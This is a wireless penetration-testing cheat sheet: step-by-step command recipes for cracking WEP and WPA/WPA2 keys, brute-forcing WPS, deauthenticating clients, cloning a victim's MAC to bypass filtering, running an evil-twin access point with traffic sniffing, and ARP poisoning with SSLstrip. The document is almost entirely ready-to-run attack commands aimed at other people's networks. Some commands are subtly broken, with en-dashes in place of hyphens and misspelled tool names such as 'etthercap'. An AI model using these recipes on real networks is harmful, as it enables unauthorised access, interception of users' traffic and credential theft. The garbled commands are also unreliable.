Wireless Penetration Testing Cheat Sheet
__________________________
WIRELESS ANTENNA
__________________________
Kill Monitor Processes
~# airmon-ng check kill

Open the Monitor Mode
~# ifconfig wlan0 down
~# airmon-ng start wlan0
// if you get an error with airmon-ng command, try this ;
// iwconfig wlan0 mode monitor
// use wlan0 instead of mon0
~# ifconfig wlan0 up

Increase Wi-Fi TX Power
~# iw reg set B0
~# iwconfig wlan0 txpower <NmW|NdBm|off|auto>
//txpower is 30 (generally)
//txpower is depends your country, please googling
~# iwconfig

Change WiFi Channel
~# iwconfig wlan0 channel <SetChannel(1-14)>
__________________________
FIND HIDDEN SSID
__________________________
~# airmon-ng start wlan0
~# airodump-ng –c <Channel> --bssid <BSSID> mon0
~# aireplay-ng -0 20 –a <BSSID> -c <VictimMac> mon0 
__________________________
WEP CRACKING (via Client)
__________________________
Method 1: ARP Request Replay Attack
~# airmon-ng start wlan0
~# airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> mon0
//What’s my mac?
~# macchanger --show mon0
~# aireplay-ng -3 –x 1000 –n 1000 –b <BSSID> -h <OurMac> mon0
~# aircrack-ng –b <BSSID> <PCAP_of_FileName>

Method 2: Interactive Packet Replay Attack
~# airmon-ng start wlan0
~# airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> mon0
//What’s my mac?
~# macchanger --show mon0
~# aireplay-ng -1 0 -a <BSSID> -h <OurMac> -e <ESSID> mon0
~# aireplay-ng -2 –p 0841 –c FF:FF:FF:FF:FF:FF –b <BSSID> -h <OurMac> mon0
~# aircrack-ng –b <BSSID> <PCAP_of_FileName>

Method 3: SKA (Shared Key Authentication) Type Cracking
~# airmon-ng start wlan0
~# airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> mon0
~# aireplay-ng -0 10 –a <BSSID> -c <VictimMac> mon0
~# aireplay-ng -1 0 –e <ESSID> -y <keystream file> -a <BSSID> -h <OurMac> mon0
~# aireplay-ng -3 –b <BSSID> -h <FakedMac> mon0
~# aireplay-ng –0 1 –a <BSSID> -h <FakedMac> mon0
~# aircrack-ng <PCAP_of_FileName> 
__________________________
WEP CRACKING (Clientless)
__________________________
Method 1: Chop Chop Attack
~# airmon-ng start wlan0
~# airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> mon0
//What’s my mac?
~# macchanger --show mon0
~# aireplay-ng -1 0 –e <ESSID> -a <BSSID> -h <OurMac> mon0
~# aireplay-ng -4 –b <BSSID> -h <OurMac> mon0
 //Press ‘y’ ;
~# packetforge-ng -0 –a <BSSID> -h <OurMac> -k <SourceIP> -l <DestinationIP> -y <XOR_PacketFile> -w <FileName2>
~# aireplay-ng -2 –r <FileName2> mon0
~# aircrack-ng <PCAP_of_FileName>

Method 2: Fragmentation Attack
~# airmon-ng start wlan0
~# airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> mon0
//What’s my mac?
~# macchanger --show mon0
~# aireplay-ng -1 0 –e <ESSID> -a <BSSID> -h <OurMac> mon0
~# aireplay-ng -5 –b<BSSID> -h < OurMac > mon0
//Press ‘y’ ;
~# packetforge-ng -0 –a <BSSID> -h < OurMac > -k <SourceIP> -l <DestinationIP> -y <XOR_PacketFile> -w <FileName2>
~# aireplay-ng -2 –r <FileName2> mon0
~# aircrack-ng <PCAP_of_FileName>
 
__________________________
WPA / WPA2 CRACKING
__________________________
Method 1: WPS Attack
~# airmon-ng start wlan0
~# apt-get install reaver
~# wash –i mon0 
~# reaver –i mon0 –b <BSSID> -vv –S
//or, Specific attack
~# reaver –i mon0 –c <Channel> -b <BSSID> -p <PinCode> -vv –S

Method 2: Dictionary Attack
~# airmon-ng start wlan0
~# airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> mon0
~# aireplay-ng -0 1 –a <BSSID> -c <VictimMac> mon0
~# aircrack-ng –w <WordlistFile> -b <BSSID> <Handshaked_PCAP>

Method 3: Crack with John The Ripper
~# airmon-ng start wlan0
~# airodump-ng –c <Channel> --bssid <BSSID> -w <FileName> mon0
~# aireplay-ng -0 1 –a <BSSID> -c <VictimMac> mon0
~# cd /pentest/passwords/john
~# ./john –wordlist=<Wordlist> --rules –stdout|aircrack-ng -0 –e <ESSID> -w - <PCAP_of_FileName>
//or
~# aircrack-ng <FileName>.cap -J <outFile>
~# hccap2john <outFile>.hccap > <JohnOutFile>
~# john <JohnOutFile>

Method 4: Crack with coWPAtty
~# airmon-ng start wlan0
~# airodump-ng –c <Channel> --bssid <BSSID> -w <FileName> mon0
~# aireplay-ng -0 1 –a <BSSID> -c <VictimMac> mon0
~# cowpatty –r <FileName> -f <Wordlist> -2 –s <SSID>
~# genpmk –s <SSID> –f <Wordlist> -d <HashesFileName>
~# cowpatty –r <PCAP_of_FileName> -d <HashesFileName> -2 –s <SSID>

Method 5: Crack with Pyrit
~# airmon-ng start wlan0
~# airodump-ng –c <Channel> --bssid <BSSID> -w <FileName> mon0
~# aireplay-ng -0 1 –a <BSSID> -c <VictimMac> mon0
~# pyrit –r<PCAP_of_FileName> -b <BSSID> -i <Wordlist> attack_passthrough
~# pyrit –i <Wordlist> import_passwords
~# pyrit –e <ESSID> create_essid
~# pyrit batch
~# pyrit –r <PCAP_of_FileName> attack_db

Method 6: Precomputed WPA Keys Database Attack
~# airmon-ng start wlan0
~# airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> mon0
~# aireplay-ng -0 1 –a <BSSID> -c <VictimMac> mon0
~# kwrite ESSID.txt
~# airolib-ng NEW_DB --import essid ESSID.txt
~# airolib-ng NEW_DB --import passwd <DictionaryFile>
~# airolib-ng NEW_DB --clean all
~# airolib-ng NEW_DB --stats
~# airolib-ng NEW_DB --batch
~# airolib-ng NEW_DB --verify all
~# aircrack-ng –r NEW_DB <Handshaked_PCAP> 
__________________________
Conect to the Network
__________________________
WEP Network
~# ifconfig wlan0 down
~# airmon-ng stop wlan0
~# iwconfig wlan0 mode managed
~# ifconfig wlan0 up
~# iwconfig wlan0 <BSSID> key < s:ASCII Passowrd / Hex Password> && dhclient wlan0

WPA/ WPA2 Network
~# ifconfig wlan0 down
~# airmon-ng stop wlan0
~# iwconfig wlan0 mode managed
~# ifconfig wlan0 up
~# wpapassphrase <ESSID> <Password> > wpa_supplicant.conf
~# wpa_supplicant -c wpa_supplicant.conf -i wlan0 -B && dhclient wlan0
__________________________
BYPASS MAC FILTERING
__________________________
~# airmon-ng start wlan0
~# airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> mon0
~# aireplay-ng -0 10 –a <BSSID> -c <VictimMac> mon0
~# ifconfig mon0 down
~# macchanger –-mac <VictimMac> mon0
~# ifconfig mon0 up
~# aireplay-ng -3 –b <BSSID> -h <FakedMac> mon0 
__________________________
MITM - Evil Twin ATTACK
__________________________
~# airmon-ng start wlan0
~# airbase-ng –e “<FakeBSSID>” mon0
//apt-get install bridge-utils
~# brctl addbr <VariableName>
~# brctl addif <VariableName> mon0
~# brctl addif <VariableName> at0
~# ifconfig eth0 0.0.0.0 up
~# ifconfig at0 0.0.0.0 up
~# ifconfig <VariableName> 192.168.1.1 up
~# echo 1 > /proc/sys/net/ipv4/ip_forward
~# aireplay-ng –deauth 0 –a <victimBSSID> mon0
~# dhclient3 <VariableName> &
~# wireshark & select <VariableName> interface
~# dsniff -i at0
__________________________
ARP-Spoofing
__________________________
~# airspoof -I <interface> -t <Target IP> <AP IP>
~# airspoof -I <interface> -t <AP IP> <Target IP>
~# echo 1 > /proc/sys/net/ipv4/ip_forward
__________________________
MITM - Etthercap 
__________________________
Basic ARP-Poisoning Attack
~# etthercap -Tq -M arp:remote -I <interface> /<AP IP>/ /<Target IP>/
//or
~# etthercap -Tq -M arp:remote -I <interface> ////Target all networks
~# echo 1 > /proc/sys/net/ipv4/ip_forward
Bypassing HTTP/ SSL using SSLstrip
~# iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 10000
~# sslstrip -p
~# etthercap -Tq -M arp:remote -I <interface> /<AP IP>/ /<Target IP>/
~# echo 1 > /proc/sys/net/ipv4/ip_forward
